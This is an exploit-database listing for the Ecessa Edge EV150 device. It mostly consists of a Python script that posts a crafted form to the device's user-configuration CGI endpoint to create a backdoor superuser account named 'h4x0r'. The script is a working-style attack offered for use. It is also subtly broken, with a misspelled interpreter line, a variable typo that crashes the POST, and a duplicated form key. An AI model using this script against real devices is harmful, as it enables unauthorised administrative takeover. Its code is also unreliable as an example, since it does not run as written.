Ecessa Edge EV150 CrossSiteRequestForgery(Add Superuser)
CVE
Category
Price
Severity
N/A
CWE-352
N/A
N/A
Author
Risk
Exploitation Type
Date
N/A
High
Remote
2019-03-26
CPE
cpe:cpe:/a:ecessa:edge_ev150
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030217 Ecessa Edge EV150 CrossSiteRequestForgery(Add Superuser) #!/usr/bin/pythono
#Exploit Title:
#Date: 3/25/2019
#Exploit Author: BehzaDghat
#Version: 10.7.4
#CVE : 2018-13032
import sys
import requests
au='/cgi-bin/pl_web.cgi/util_configlogin_act'
def help_message():
print """
{} -h ---> show this message
{} -u URL ---> start exploit
example: {} -u http://target.com
""".format(sys.argv[0],sys.argv[0],sys.argv[0])
def error_optiont():
print """\ntype and enter {} -h""".format(sys.argv[0])
data_fs={'savecrtcfg':'checked','user_username1':'root','user_enabled1':'on','user_passwd1':'','user_passwd_verify1':'',
'user_delete1':'','user_username2r':'admin','user_passwd2':'','user_passwd_verify2':'','user_delete2':'',
'user_username3':'user','user_enabled3':'on','user_passwd3':'','user_passwd_verify3':'','user_delete3':'',
'user_username4':'h4x0r','user_enabled4':'on','user_superuser4':'on','user_passwd4':'123123','user_passwd_verify4':'123123',
'page':'util_configlogin','val_requested_page':'user_accounts','savecrtcfg':'checked'
,'page_uuid':'3e2774f9-1cd3-4d36-a91e-eb9e42b5ba0d',
'form_has_changed':'1','submit':'Supersize!'}
if len(sys.argv)>1 and sys.argv[1]=='-h':
help_message()
exit()
elif len(sys.argv)==3 and sys.argv[1]=='-u':
urlt=sys.argv[2]+au
if '200' in str(requests.get(urlt)):
print 'Send DATA'
r=requests.post(urtl,data=data_fs)
if '200' in str(r):
print 'Added User'
else:
print 'Not Found Page'
else:
print 'Type And Enter -> python {} -h'.format(sys.argv[0])
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum